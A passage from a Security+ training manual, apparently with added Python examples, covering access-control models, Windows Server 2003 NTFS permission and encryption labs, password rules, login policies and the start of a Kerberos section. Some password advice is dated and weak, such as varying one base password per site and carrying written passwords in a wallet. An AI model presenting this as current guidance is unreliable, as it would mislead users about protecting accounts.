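class DacResource:
    owner: str
    acl: dict = field(default_factory=dict)  # principal -> set of permissions

    def grant(self, actor, principal, *perms):
        """Only the owner may change the ACL; that discretion is the model's risk."""
        if actor != self.owner:
            raise PermissionError(f"{actor} does not own this resource")
        self.acl.setdefault(principal, set()).update(perms)

    def allows(self, principal, perm):
        return principal == self.owner or perm in self.acl.get(principal, set())


# --- RBAC: permissions attach to roles; users hold one or more roles. ---
ROLE_PERMS = {
    "accounting": {("ledger", "read"), ("ledger", "write")},
    "hr":         {("personnel", "read"), ("personnel", "write")},
    "auditor":    {("ledger", "read"), ("personnel", "read")},
}
USER_ROLES = {"alice": {"accounting"}, "bob": {"hr", "auditor"}}


def rbac_allows(user, resource, perm):
    """Grant if any of the user's roles carries (resource, perm)."""
    return any((resource, perm) in ROLE_PERMS[r] for r in USER_ROLES.get(user, ()))


def demo():
    """Run one request through each model; returns the three decisions."""
    mac = mac_allows("confidential", "secret")        # False: clearance too low
    doc = DacResource(owner="carol")
    doc.grant("carol", "dave", "read")
    dac = doc.allows("dave", "write")                 # False: owner granted read only
    rbac = rbac_allows("alice", "personnel", "read")  # False: accounting cannot see HR files
    return mac, dac, rbac


if __name__ == "__main__":
    print(demo())
```

The DAC class is where the drawback described above shows up: nothing stops an owner from granting "write" to everyone, whereas in the MAC and RBAC functions the user's wishes never enter the decision.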

                  Using NTFS to implement access control
                  Almost all network operating systems allow administrators to define or set DAC
                  settings. Windows NT, 2000, Server 2003, and XP Professional computers set DAC
                  values using Windows Explorer.
                  To implement local file security on a Windows NT-based computer, you must convert
                  the FAT partition(s) to NTFS format.

Do it!   D-1:   Converting to an NTFS system

Instructor note: Tell students this activity will show them how to determine whether a file
partition is FAT or NTFS, as well as how to convert a FAT partition to NTFS. The FAT
partition in this lab will be designated as drive letter E. However, if you have more drives
installed, this might be a higher letter than E:. Be sure students do not change drive C:. If
students convert the system partition, they’ll have to reboot for the conversion to take place.

          Here’s how                               Here’s why
          1 Log on to the Windows Server
            2003 server as Administrator

          2 Click Start

            Choose Run

            Type cmd

            Press Enter                            To access the command window.

          3 At the command line, enter             To determine whether a file partition is FAT or
            chkntfs e:                             NTFS.

                                                   You will see the message, “The type of the file
                                                   system is FAT 32. E: is not dirty”. This indicates
                                                   that NTFS was not yet installed and there is no
                                                   corruption on the drive.

          4 At the command line, enter             To convert the FAT partition to NTFS.
            convert e: /fs:ntfs

          5 If the drive has a volume label,       Windows will then convert the drive to NTFS.
            enter it when prompted

          6 At the command line, enter             To verify that the drive is now NTFS.
            chkntfs e:

          7 Enter exit                             To close the Command window.

                           Data confidentiality
Explanation                After a secure file system is installed, you can begin to think about data confidentiality.
                           Data confidentiality refers to making sure only those intended to have access to certain
                           data actually have that access. With the FAT file system, this is not possible at the local
                           level, but with NTFS, you can lock down both folders and files locally. NTFS can be
                           used to protect data from intruders who might have physical access to the computer
                           containing the data. Exhibit 1-1 shows the default NTFS permissions.




                           Exhibit 1-1: Default NTFS permissions on a Windows Server 2003 server


Do it!   D-2:   Ensuring data confidentiality

Instructor note: In this activity, students will create a folder and files, assign NTFS
permissions, and then verify whether the data is confidential. Make sure students don’t
remove User1 in step 15. Tell students User1 does not have a password.

          Here’s how                                  Here’s why
          1 Open My Computer                          Click Start and choose My Computer.

            Double-click the E: drive                 This should be the drive that was converted
                                                      from FAT to NTFS.

          2 Create a new folder called Confidentiality

          3 Double-click the Confidentiality folder

          4 Create a new folder called User1Folder

          5 Right-click User1Folder

            Choose Properties                         The User1Folder Properties screen appears.

          6 Activate the Security tab                 The Security tab is displayed, as shown in
                                                      Exhibit 1-1.

          7 Click Advanced

          8 Clear Allow inheritable                   You’ll be prompted to Copy, Remove, or
            permissions from parent                   Cancel.
            to propagate to this object
            and all child objects.
            Include these with entries
            explicitly defined here.

          9 Click Copy                                To retain the permissions.

         10 Click OK                                  To return to the Security tab.

         11 Click Add…                                To start the process of adding access
                                                      permissions for User1.

                                                      The Select Users or Groups window appears.

         12 Click Advanced…

         13 Click Find Now                            To identify users and groups on the system.

            Under Search results, select              You might have to scroll to see User1.
            User1

            Click OK twice                            To add User1 to the access control list.

         14 With User1 still highlighted,             Full Control activates all other permissions in
            select Allow for Full Control             the list.

         15 Select each group in the list of          To remove the Administrators, Creator Owner,
            Group or user names and click             System and Users groups from the access
            Remove for each group                     control list. Do not remove User1.

            Click OK                                  To save the changes.

         16 Double-click User1Folder                  You are denied access because you granted
                                                      access to the folder only to User1.

         17 Close all windows and log off

         18 Log on as User1 and navigate to           To verify that User1 has access to the folder.
            the User1Folder                           You should be able to open the folder.

         19 Close all windows and log off

                            Data availability
Explanation                 Although it is important that data remains secure and confidential, it is just as important
                            that the data is available when needed. Secured data that is inaccessible results in
                            downtime and is detrimental to a business and its ability to serve customers.
                            Technologies such as clustering and load balancing can help, but if NTFS permissions
                            are assigned inappropriately, these features will not remedy the situation.

Do it!   D-3:   Making data available

Instructor note: In this activity, students will examine how NTFS permissions affect a
user’s access to resources. Point out to students that User2 does not require a password
to log on.

          Here’s how                                 Here’s why
          1 Log on to the Windows Server
            2003 server as Administrator

          2 Open My Computer

            Double-click the E: drive

          3 Create a new folder called
            Availability

          4 Double-click the Availability
            folder

          5 Create a folder called User2Folder

          6 Right-click User2Folder

            Choose Properties                        To open the User2Folder Properties window.

          7 Activate the Security tab

          8 Click Advanced

          9 Clear Allow inheritable                  You’ll be prompted to Copy, Remove, or
            permissions from parent                  Cancel.
            to propagate to this object
            and all child objects.
            Include these with entries
            explicitly defined here.

         10 Click Remove                             To clear the permissions.

         11 Click OK                                 To return to the Security tab.

         12 Click Yes                                To acknowledge the Security message and
                                                     continue.

         13 Click Add…                               To open the Select Users or Groups window.

         14 Click Advanced…

         15 Click Find Now

            Select User2                             You might have to scroll to see the user.

            Click OK twice                           To add User2 to the access control list.

         16 With User2 still highlighted,            To assign User2’s permissions.
            select Allow for Full Control

            Click OK                                 To save the changes.

         17 Close all windows and log off

         18 Log on as User2

         19 Verify that you have access to
            e:\Availability\User2Folder

         20 Close all windows and log off

         21 Log on as Administrator

         22 Delete the User2 account from the        Click Start, right-click My Computer and choose
            local security database                  Manage. Expand Local Users and Groups.
                                                     Select Users and delete User2.

         23 Create a new user, also named            With Users selected, choose Action, New User.
            User2                                    Enter User2 as the User name, clear User must
                                                     change password at next logon and click Create.
                                                     Click Close.

         24 Display the Security tab in the          Notice that the User2 account is no longer listed,
            properties of                            but the account’s SID is.
            e:\Availability\User2Folder

         25 Log on as User2 and try to access        You are denied access to this folder.
            the e:\Availability\
            User2Folder

         26 Close all windows and log off
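Step 24 of activity D-3 shows the deleted User2’s SID still sitting in the ACL, and step 25 shows the recreated User2 denied. The following added example (not from the manual) models why: it is a constructed stand-in for the local security database and for an NTFS ACL, in which entries are keyed by SID rather than by account name and RIDs are never reused. The SID prefix and numbers are made up; only the S-1-5-21-...-RID shape follows Windows.

```python
"""Why recreating a deleted account does not restore its NTFS permissions.

Added example, not from the Security+ manual: a constructed stand-in for the
local security database and for an NTFS ACL. The SID prefix and RIDs are
made up; only the shape (S-1-5-21-...-RID) follows Windows.
"""
import itertools


class LocalSecurityDatabase:
    """Maps account names to unique SIDs; RIDs are never reused."""

    def __init__(self):
        self._rid = itertools.count(1000)   # constructed: first user RID
        self.by_name = {}
        self.by_sid = {}

    def create_user(self, name):
        sid = f"S-1-5-21-0-0-0-{next(self._rid)}"   # constructed machine prefix
        self.by_name[name] = sid
        self.by_sid[sid] = name
        return sid

    def delete_user(self, name):
        sid = self.by_name.pop(name)
        del self.by_sid[sid]         # the SID now resolves to no name

    def lookup_sid(self, name):
        return self.by_name[name]


class Acl:
    """Entries are keyed by SID, which is all the file system ever stores."""

    def __init__(self):
        self.entries = {}

    def allow(self, sid, perm):
        self.entries.setdefault(sid, set()).add(perm)

    def check(self, sid, perm):
        return perm in self.entries.get(sid, set())

    def render(self, sam):
        """What the Security tab shows: a name if the SID resolves, else the raw SID."""
        return [(sam.by_sid.get(sid, sid), sorted(p)) for sid, p in self.entries.items()]


def run_lab():
    """Replays steps 16 through 25 of activity D-3 against the model."""
    sam = LocalSecurityDatabase()
    old_sid = sam.create_user("User2")
    acl = Acl()
    acl.allow(old_sid, "Full Control")                            # step 16
    before = acl.check(sam.lookup_sid("User2"), "Full Control")   # step 19: allowed
    sam.delete_user("User2")                                      # step 22
    new_sid = sam.create_user("User2")                            # step 23
    listing = acl.render(sam)                                     # step 24: orphaned SID
    after = acl.check(sam.lookup_sid("User2"), "Full Control")    # step 25: denied
    return before, after, old_sid != new_sid, listing


if __name__ == "__main__":
    print(run_lab())
```

The orphaned entry is the detail to remember when cleaning up after departed staff: the permission still exists on disk, but it belongs to a SID that no account will ever hold again, so it should be removed rather than assumed harmless.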

                         Data integrity
Explanation              After data is secured properly and available to the appropriate people, it is important to
                         make sure the contents of the data have not been altered accidentally or intentionally.
                         Malicious corruption is a problem, and can be done by a virus, worm, or hacker.
                         Accidental changes, however, can also damage data integrity. For example, Windows
                         Server 2003 file synchronization capabilities could easily lead to accidental corruption.
                         Changes made to data that conflict with other changes to the same data could damage
                         data integrity just as much as a hacker can. Environmental problems can also lead to
                         data integrity issues; such problems include dust, surges, and excessive heat.
                         Windows Server 2003 default permissions are configured in such a way that only the
                         creator of a file and users who belong to the System Administrators group can change a
                         file by default. Members of the Users group can view a file by default, but cannot make
                         changes. To enable others to change a file, permissions have to be specifically assigned.

Do it!   D-4:   Maintaining data integrity
          Here’s how                              Here’s why
          1 Log on to the Windows Server
            2003 server as User1

          2 In My Computer, display the E:
            drive

          3 Create a new folder called
            Integrity

          4 Within the Integrity folder, create
            a new folder called User1Folder

          5 Within User1Folder, create a new
            text document

          6 Type This document has not            In the new text document.
             been modified accidentally
             or intentionally.

          7 Save the file as
             New Text Document

          8 Close the document

          9 Log off User1

         10 Log on as User2

         11 Navigate to
            e:\Integrity\User1Folder

         12 From the New Text Document,           You did not change the default permissions on
            remove the word not                   e:\Integrity\User1Folder, so you can still view
                                                  the contents of the file as User2.

         13 Try to save the changes to the        You receive an error message that you can't save
            file                                  the file. The data integrity of the file is
                                                  maintained.

         14 Close all windows and log off
            User2

                              Data encryption
Explanation                   With NTFS, you are not limited to folder- and file-level security. Another function of
                              NTFS is the ability to encrypt data. Encryption is the process of taking readable data
                              and making it unreadable. Encryption is commonly used for remote data transfer, but it
                              can also be used for local security. Laptop users might want to use NTFS to secure and
                              encrypt their data in the event the laptop is stolen. While this solution is not 100%
                              effective, it does make it more difficult to hack into your system. Windows Server 2003
                              offers a very easy way to encrypt files on an NTFS partition.

Do it!                        D-5:    Encrypting data
                               [Instructor note: This activity demonstrates how to encrypt data within a file.]
                               Here’s how                               Here’s why

                                1 Log on to the Windows Server
                                  2003 server as User2

                                2 In My Computer, open the E:
                                  drive

                                3 Create a new folder called
                                  Encryption

                                4 Within the Encryption folder,
                                  create a new folder called
                                  User2Folder

                                5 Within User2Folder, create a new
                                  text document

                                   Edit the content to read
                                   This document is for my
                                   eyes only.

                                6 Save the document as
                                   Private Document

                                   Close the document

                                7 Right-click the document

                                   Choose Properties

 8 Click Advanced




   Check Encrypt contents to
   secure data

   Click OK

 9 Click OK a second time




10 Select the Encrypt the file
   only radio button

   Click OK

11 Log off as User2

12 Log on as User1

13 Try to access the Private     Access should be denied. You'll also notice the
   Document file in              file name displays in green to indicate it's been
   e:\Encryption\User2Folder     encrypted.

14 Log off User1


Unit summary: Security overview
Topic A              In this topic we discussed the importance of network security. You learned that
                     network security is the process by which digital information assets are protected. You
                     also learned the goals of network security: integrity, confidentiality, and availability. You
                     learned that confidentiality is the protection of data from unauthorized disclosure to a
                     third party, availability is the continuous operation of computing systems, and integrity
                     is the assurance that data has not been altered or destroyed.
Topic B              In this topic, you learned about the types of threats and their ramifications. You learned
                     there are four primary causes for network security breaches: technology weaknesses,
                     configuration weaknesses, policy weaknesses, and human error or malice.
Topic C              In this topic, you learned about the goals of network security. You learned the most
                     important goal of network security is to achieve the state where any action that is not
                     expressly permitted is prohibited. You also learned how to create a secure network
                     strategy. You learned that the goal in developing a security policy is to define the
                     organization’s expectations for computer and network use.
Topic D              In this topic, you learned about the three methods of access control: MAC, DAC and
                     RBAC. You implemented network security on an NTFS system and learned how to
                     ensure data confidentiality, availability and integrity. You also learned how to
                     encrypt data.

                     Review questions
                       1 What file systems are compatible with Windows NT 4.0?
                         A   FAT
                         B FAT32
                         C OSPF
                         D   NTFS
                       2 Which of the following commands will convert a FAT partition to NTFS?
                         A update C: /FS:NTFS
                         B upgrade C: /FS:NTFS
                         C   convert C: /FS:NTFS

                         D convert C: /NTFS

3 Which of the following is the best definition of “data confidentiality”?
  A Data that has not been tampered with intentionally or accidentally
  B Data that has been scrambled for remote transmission
  C   Data that is secured so only the intended people have access

  D Data that can be accessed when it is needed
4 Which of the following is the best definition of “data availability”?
  A Data that has not been tampered with intentionally or accidentally
  B Data that has been scrambled for remote transmission
  C Data that is secured so only the intended people have access
  D   Data that can be accessed when it is needed
5 How can data confidentiality affect data availability?
  A They are two independent areas and do not affect each other
  B For data to be available, it cannot be confidential
  C   Data that is secured too strongly might conflict with the availability
  D Data that is secured too weakly might conflict with the availability
6 Which of the following is the best definition of “data integrity”?
  A   Data that has not been tampered with intentionally or accidentally
  B Data that has been scrambled for remote transmission
  C Data that is secured so only the intended people have access
  D Data that can be accessed when it is needed
7 Which of the following can damage data integrity? (Choose all that apply.)
  A   Viruses

  B   Worms

  C   Hackers

  D   Trojan Horses

                    8 Data Integrity can also be threatened by environmental hazards such as dust, surges,
                      and excessive heat. True or false?
                      True

                    9 Which of the following is the best definition of “encryption”?
                      A Data that has not been tampered with intentionally or accidentally
                      B   Data that has been scrambled for remote transmission

                      C Data that is secured so only the intended people have access
                      D Data that can be accessed when it is needed


Unit 2
Authentication
                 Unit time: 120 minutes

                 Complete this unit, and you’ll know how to:

                 A Create strong passwords and store them
                    securely.

                 B Discuss the Kerberos authentication
                    process.

                 C Explain how CHAP works.

                 D Explain how digital certificates are created
                    and why they are used.

                 E Discuss what tokens are and how they
                    function.

                 F Explain the biometric authentication
                    processes.


Topic A: Introduction to authentication
                     This topic covers the following CompTIA Security+ exam objectives:

                      #      Objective

                      1.2    Recognize and be able to differentiate and explain the following methods of authentication
                              • Username/Password

                      1.3    Identify non-essential services and protocols and know what actions to take to reduce the risks of
                             those services and protocols




                     Authentication
Explanation          Security of system resources generally follows a three-step process of authentication,
                     authorization, and accounting (AAA). This AAA model begins with positive
                     identification of the person or system seeking access to secured information or services
                     (authentication). That person is granted a predetermined level of access to the resources
                     (authorization), and the use of each asset is then logged (accounting). The most critical
                     step in the process is authentication. Without a positive identification, other steps are
                     worthless, because they cannot distinguish between the authorized user and an imposter.
                     The amount of security implemented in the authentication process should be
                     proportional to the value of the resources being protected. As our dependence on
                     computer network systems has increased, so has our willingness to pay for stronger
                     authentication technologies to secure against attack.

                     Usernames and passwords
                     Secret passwords have been used for millennia to gain access to otherwise forbidden
                     places. They have been as simple as “open sesame” and as demanding as the exact
                     words to a very long poem. In today’s computing environment, they are the prevailing
                     means of authentication.

                     Usernames
                     A username is a unique identifier that we use to identify ourselves to a computer or
                     network system when we log on. It is usually constructed of easily remembered
                     characters. The username and password together allow for a user’s authentication. The
                     username should be treated as an equal part of the authentication key and held in similar
                     confidence to the password. Not keeping your username secret can provide a potential
                     hacker with half the information needed to masquerade as you and obtain the use of all
                     your system rights and privileges.

                     Passwords
                     A password is a secret combination of key strokes that, when combined with your
                     username, authenticates you to the computer or network system. In terms of
                     authentication, it is something that we know, rather than something we own or a part of
                     who we are, such as key card or a fingerprint. We are required to use many different
                     passwords, so we tend to prefer short, easy-to-remember passwords because longer
                     passwords take too long to type, and more complex passwords are more difficult to
                     remember.

                         With increasing numbers of sites requiring authorization, users often choose to reuse the
                         same simplistic password on multiple sites, aggravating the vulnerabilities of the
                         authentication keys of which such passwords are a part.

                         Password protection guidelines
                         The proliferation of computing has led to the use of weak personal password techniques.
                         These weak techniques are the crux of the problem with passwords. We are now
                         operating in a digital environment in which the bad guys are using faster and more
                         capable computers and applications to violate our computer systems; because of this, we
                         need to construct, use, and store our passwords more carefully.
                         There are many different password conventions, but there are five basic rules to follow
                         in order to safeguard your passwords:
                             • Passwords must be memorized. If they must be written down, the written records
                               must be locked up.
                             • For multiple applications, each password you choose must be different from any
                               other you use.
                             • Passwords must be at least six characters long, and preferably longer, depending
                               on the size of the character set used.
                             • Passwords must contain a mixture of letters (both uppercase and lowercase) if
                               the operating system supports case-sensitive passwords, numbers, and other
                               characters, such as %, !, or &.
                             • Passwords must be changed periodically.
                         [Instructor note: Some operating systems, such as NetWare, do not recognize the
                         difference between uppercase and lowercase letters.]

                         Strong password creation techniques
                         It is important to choose passwords that are easy to remember but difficult for others
                         to guess. One way to do this is to think of a simple phrase or the words to a song that
                         can be easily remembered, such as “April showers bring Might flowers.” Use the first
                         letter of each word and add a number and a punctuation mark or another character,
                         which might give you “Asb4Mf?”
                         Another technique is to combine two dissimilar words and place a number between
                         them, such as “SleigH9ShoE.” One can also substitute numbers for letters, but this
                         should be done carefully. Replacing the words “to” and “for” with their numeric
                         synonyms, “2” and “4,” is a fairly obvious ploy to most hackers. An all too frequent
                         example of this simple substitution process is “pa55w0rd.” A five is just a reformatted
                         “S,” and zero could easily be the letter “O.”
                         Most password cracking utilities check for these types of well-known substitutions. The
                         key is that your password means something to you and that it creates a strong password,
                         one that cannot be easily guessed or quickly discovered using a brute force attack (the
                         process of systematically trying every single possible combination of characters until
                         the correct combination is determined).
                         [Instructor note: Have each student devise a strong password and write it down on a
                         piece of paper along with their name. Collect the papers and, after several more minutes
                         of discussion, have each student recall their password. You be the judge as to whether
                         the password qualifies as strong.]
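As an added example (not code from the course), the following Python checker applies the five rules above and undoes the well-known substitutions that cracking utilities test, so “pa55w0rd” is recognized as “password” while “Asb4Mf?” passes; it also sizes the search space a brute-force attack faces. The substitution table and wordlist are constructed samples, and the brute-force figure assumes the 94 printable ASCII characters.

```python
import math
import re

# Digit/symbol-for-letter swaps that cracking utilities try first (a constructed, common subset).
SUBSTITUTIONS = {"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"}

# Constructed stand-in for a cracker's dictionary; real wordlists hold millions of entries.
WORDLIST = {"password", "secret", "welcome", "letmein", "april", "torrential"}

# Digits and punctuation that people tack on the ends of a base word ("P@ssw0rd1").
EDGE_CHARS = "0123456789!?@#$%^&*()_-+=.,"


def dictionary_base(password: str):
    """Return the dictionary word the password reduces to once the edge digits and
    punctuation are dropped and the substitutions are undone, or None if there is none.
    Real crackers try every reading of an ambiguous character; this maps each to one."""
    core = password.lower().strip(EDGE_CHARS)
    normalized = "".join(SUBSTITUTIONS.get(c, c) for c in core)
    return normalized if normalized in WORDLIST else None


def brute_force_combinations(password: str) -> int:
    """Size of the search space a brute-force attack must cover when it knows only the
    length and which character classes are present (26 + 26 + 10 + 32 printable ASCII)."""
    classes = [(r"[a-z]", 26), (r"[A-Z]", 26), (r"[0-9]", 10), (r"[^A-Za-z0-9]", 32)]
    charset = sum(size for pattern, size in classes if re.search(pattern, password))
    return charset ** len(password)


def guideline_failures(password: str, other_passwords=(), min_len: int = 6) -> list:
    """Check a password against the five rules above plus the substitution test.
    The fifth rule (periodic change) needs a password history and is not checked here.
    An empty list means the password passed."""
    failures = []
    if len(password) < min_len:
        failures.append(f"shorter than {min_len} characters")
    if not (re.search(r"[a-z]", password) and re.search(r"[A-Z]", password)):
        failures.append("no mix of uppercase and lowercase letters")
    if not re.search(r"[0-9]", password):
        failures.append("no number")
    if not re.search(r"[^A-Za-z0-9]", password):
        failures.append("no other character such as %, ! or &")
    if password in other_passwords:
        failures.append("already used for another application")
    base = dictionary_base(password)
    if base:
        failures.append(f"reduces to the dictionary word '{base}' once substitutions are undone")
    return failures


if __name__ == "__main__":
    for pw in ("pa55w0rd", "SleigH9ShoE", "Asb4Mf?"):
        bits = math.log2(brute_force_combinations(pw))
        print(f"{pw:12s} {bits:5.1f} bits of brute-force work  {guideline_failures(pw) or 'OK'}")
```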

                         Techniques to use multiple passwords
                         People often have access to many different systems, each requiring a
                         username/password set. It is recommended that you use a different password every time
                         one is required. Alternatively, you can group Web sites or applications by their
                         appropriate level of security and use a different password for each of those groups,
                         while still taking care to use a unique password for each of the more critical Web sites
                         (for example, those of financial institutions) and applications (for example, financial
                         software).

                 For example, one lower-level group might make up the various news and weather-
                 related Web sites you visit. If someone were to obtain your password to these sites, it
                 would do you no real harm.
                 Another method is to cycle your more complex passwords down the groups, from most
                 sensitive to least. This allows you to reduce the total number of passwords that you are
                 using while giving you time to work with a given password (and remember it) before
                 relegating it for use in the more insecure password entry fields that you might
                 encounter. You might also try using a common password base, but change parts of the
                 password depending on where you are required to use it. For example, you could take
                 the password “ToRn71@L” (sort of like “torrential”) and depending on the Web site
                 change the “T,” “R,” and “L” to “NoYn71@T” for the New York Times Web site and
                 “SoAn71@N” for the SANS Institute Web site.

                 Storing passwords
                 If you must write a list of your various passwords down on paper, keep the piece of
                 paper close to you in an item that you are not likely to lose sight of, such as a purse or
                 wallet. These passwords should be written in very small type to minimize the chance of
                 someone else reading the information.
                 Another good practice is to develop a personal code to apply to your password list. For
                 instance, the first three characters of each password might be transposed and moved to
                 the end of the password string, and the hostname might be moved down one place in the
                 list, lining it up with a password for a different server. The individual who owns this
                 written password card would have no problem quickly decoding the information to
                 enter, but it adds a small delay for anyone who would maliciously use the information.
                 If you keep this list electronically, encrypt the password list with Windows 2000/Server
                 2003/XP encryption or some application that is specifically designed for this purpose.
                 Password protect the encrypted file with a strong password (different from your login
                 password) and never electronically store the password that gains access to the file.

                 The RunAs service
                 RunAs allows an administrator to log on with a standard user account and still run
                 administrative programs with administrative rights. Those rights are only applied to the
                 application, so viruses, worms, and Trojan Horses cannot access the network with
                 administrative privileges.
                 To activate RunAs, press Shift and then right-click an application, shortcut or service.
                 Provide the appropriate administrator credentials and click OK. This way, you can, for
                 example, check e-mail and perform necessary management tasks without actually being
                 logged on as administrator. At the same time, having RunAs available makes it possible
                 for regular users to access the network with administrative privileges should they know
                 the logon credentials of an administrative user. To prevent users from using the RunAs
                 service, you can disable it. Notice that you shouldn't use RunAs to run certain
                 applications, such as word processing applications.

                 Setting login policies in Windows Server 2003
                 Windows Server 2003 provides several safeguards to discourage hackers from attacking
                 your network. These include the following:
                     • Removing the name of the last user to log on to the system. Without an account
                       name, the hacker has an extra step to complete before gaining access to the
                       system.

             • Specifying a minimum length for passwords. Short passwords or blank
               passwords are easy to crack.
             • Setting the password complexity to require use of at least three of the following:
               one number, one uppercase letter, one lowercase letter, or one symbol.
               Combining password length with complexity is a method recommended by
               security professionals.
             • Implementing an account lockout policy. The account lockout policy will
               disable an account for a specific amount of time after a certain number of failed
               logon attempts.
         To prevent display of the last logon name in Windows Server 2003, modify the local
         security policy and change the “Interactive logon: Do not display last user name” option
         to Enabled.

Do it!   A-1:    Preventing the display of the last logon name
          Here’s how                                Here’s why
           1 Log on to the Windows Server
             2003 server as Administrator

           2 Click Start

              Choose Administrative                 The Local Security Settings window appears.
              Tools, Local Security Policy

           3 Expand Local Policies




           4 Select Security Options

           5 Double-click Interactive
              logon: Do not display last
              user name

           6 Select Enabled

              Click OK

           7 Close all windows and log off

           8 Press Ctrl+Alt+Delete                    Notice the User name field is empty in the logon
                                                     screen.

                             Minimum password lengths
Explanation                  To specify a minimum length for passwords in Windows Server 2003, modify the local
                             security policy and change the “Minimum password length” option.

Do it!                       A-2:    Using the Windows Server 2003 local password
                                     policy settings for length
                              Here’s how                             Here’s why
                               1 Log on to the Windows Server
                                 2003 server as Administrator

                               2 Click Start

                                 Choose Administrative               To access the Local Security Settings window.
                                 Tools, Local Security
                                 Policy

                               3 Expand Account Policies

                               4 Select Password Policy              To start the process of changing the default
                                                                     password policy.

                               5 Double-click Minimum
                                 password length

                                 Change the characters value to 9

                               6 Click OK

                               7 Close all windows and log off

                               8 Log on as User1                     The user does not yet require a password to log
                                                                     on.

                               9 Press Ctrl+Alt+Delete

                              10 Click Change Password…

                                 In both the New Password and Confirm New Password text boxes, type a new
                                 password of less than 9 characters

                                 Click OK                            A message appears stating that your password
                                                                     must be at least 9 characters long, cannot
                                                                     repeat any of your previous 0 passwords, and
                                                                     must be at least 0 days old.
                                 [Instructor note: Tell students this step is not meant to be successful.]

                              11 Assign password1 as the new         To change the password.
                                 password

                              12 Click OK

                              13 Log off

                    Password complexity
Explanation         Finally, to set the password complexity in Windows Server 2003, modify the local
                    security policy and change the “Passwords must meet complexity requirements” option.

Do it!              A-3:    Using the Windows Server 2003 local password
                            policy settings for complexity
                     Here’s how                                Here’s why
                      1 Log on to the Windows Server
                        2003 server as Administrator

                      2 Click Start

                         Choose Administrative                 To access the Local Security Settings window.
                         Tools, Local Security
                         Policy

                      3 Expand Account Policies                (If necessary.)

                      4 Select Password Policy                 (If necessary.)

                      5 Double-click Password must meet
                        complexity requirements

                         Select Enabled

                      6 Click OK

                      7 Close all windows and log off

                      8 Log on as User1

                       9 Press Ctrl+Alt+Delete

                     10 Click Change Password…

                         In the Old Password box, type password1

                         In the New Password box and Confirm New Password box, type password321

                     11 Click OK                               A message box appears, indicating restrictions
                                                               and steps for completing the password change.
                        [Instructor note: Review the entire message with your students.]

                     12 Assign Password1 as the new            The password change is successful. Changing
                        password                               the p in password to a capital P caused the
                                                               password to meet the password complexity
                                                               requirements.

                     13 Log off User1
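The password length and complexity settings exercised in activities A-2 and A-3, together with the account lockout policy described earlier in this topic, modelled in Python as an added example (not the course's or Microsoft's code). It reproduces the outcomes of the activities: a password shorter than 9 characters is rejected, password321 fails complexity, and Password1 passes. The LocalSecurityPolicy and Workstation classes, the account names and the lockout bookkeeping are this example's own simplifications; the check that a password must not contain the account name is part of the real Windows complexity rule but is not listed in the text above.

```python
from dataclasses import dataclass
import re


@dataclass
class LocalSecurityPolicy:
    """The Local Security Policy settings modelled here. The defaults are this
    example's starting point (constructed), not Windows Server 2003 defaults."""
    minimum_password_length: int = 0
    complexity_required: bool = False
    lockout_threshold: int = 0          # failed logons before lockout; 0 = never lock
    lockout_duration: float = 30 * 60   # seconds the account stays disabled


def meets_complexity(password: str, username: str) -> bool:
    """'Passwords must meet complexity requirements': at least three of the four
    categories (uppercase, lowercase, number, symbol), and no account name inside."""
    if username.lower() in password.lower():
        return False
    categories = [r"[A-Z]", r"[a-z]", r"[0-9]", r"[^A-Za-z0-9]"]
    return sum(1 for pattern in categories if re.search(pattern, password)) >= 3


def password_change_errors(policy: LocalSecurityPolicy, username: str, new_password: str) -> list:
    """The restrictions Windows reports when a new password violates the policy."""
    errors = []
    if len(new_password) < policy.minimum_password_length:
        errors.append(f"must be at least {policy.minimum_password_length} characters long")
    if policy.complexity_required and not meets_complexity(new_password, username):
        errors.append("must contain at least three of: uppercase, lowercase, number, symbol")
    return errors


class Workstation:
    """Holds the local accounts and enforces the lockout policy on logon attempts.
    Simplification: the failure count is only reset by a successful logon or a lockout
    (real Windows also resets it after a configurable interval)."""

    def __init__(self, policy: LocalSecurityPolicy, accounts: dict):
        self.policy = policy
        self.accounts = dict(accounts)   # username -> current password (constructed sample)
        self.failures = {}               # username -> consecutive failed logons
        self.locked_until = {}           # username -> time the lockout ends

    def logon(self, username: str, password: str, now: float) -> str:
        if self.locked_until.get(username, 0) > now:
            return "locked out"
        if self.accounts.get(username) == password:
            self.failures.pop(username, None)
            return "ok"
        count = self.failures.get(username, 0) + 1
        self.failures[username] = count
        if self.policy.lockout_threshold and count >= self.policy.lockout_threshold:
            self.locked_until[username] = now + self.policy.lockout_duration
            self.failures.pop(username, None)
            return "locked out"
        return "bad password"

    def change_password(self, username: str, old: str, new: str) -> list:
        """Returns the list of policy errors; an empty list means the change succeeded."""
        if self.accounts.get(username) != old:
            return ["old password is incorrect"]
        errors = password_change_errors(self.policy, username, new)
        if not errors:
            self.accounts[username] = new
        return errors
```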


Topic B: Kerberos
                           This topic covers the following CompTIA Security+ exam objective:

                            #       Objective

                            1.2     Recognize and be able to differentiate and explain the following methods of authentication
                                     • Kerberos
                                     • Mutual




                           Introducing Kerberos
Explanation                In 1983, researchers at the Massachusetts Institute of Technology (MIT) started a five-
                           year project to incorporate computers into the MIT curriculum. As part of the project, a
                           leading edge network authentication protocol was developed. It was named Kerberos,
                           after the three-headed dog that guarded the entrance to Hades in Greek mythology.
                           In 1989, version 4 was publicly released as open source code. Although Kerberos 4 is
                           still in use in a few environments, Kerberos 5 is the standard today. As of this writing,
                           the latest version is Kerberos 5-1.4.2. Kerberos is freely available to anyone in the U.S.
                           and Canada from the following Web page:
                                  itinfo.mit.edu/product.php?name=Kerberos
                           [Instructor note: Point out that Kerberos 5 is the current standard today. Point to the
                           Web site where Kerberos security is freely available.]
                           Kerberos provides a means to authenticate users and services over an open multi-
                           platform network using a single login procedure. After the user is authenticated by the
                           system, all subsequent commands and transactions can be carried out securely without
                           any prompting for a password.

Terminology
The Kerberos system consists of the following components:
   • Principal — Any uniquely-named client or server to which Kerberos can assign
     tickets.
    • Authentication Server (AS) — A network service that authenticates users or
      services, then supplies ticket-granting tickets to the authorized user or service.
    • Ticket-Granting Server (TGS) — A network service that supplies temporary
      session keys and tickets to authorized users or services.
    • Key Distribution Center (KDC) — A server running both the AS and TGS services; it
      services both initial ticket requests and ticket-granting ticket requests.
    • Realm — An organizational boundary that is formed to provide authentication
      boundaries. Each realm has an Authentication Server and a Ticket-Granting
      Server.
    • Remote Ticket-Granting Server (RTGS) — A remote realm’s TGS.
The following terms describe types of data that are passed over the network during
Kerberos processing:
    • Credentials — A ticket for the resource server plus a temporary encryption key
      (session key).
    • Session key — A temporary encryption key used between the client and
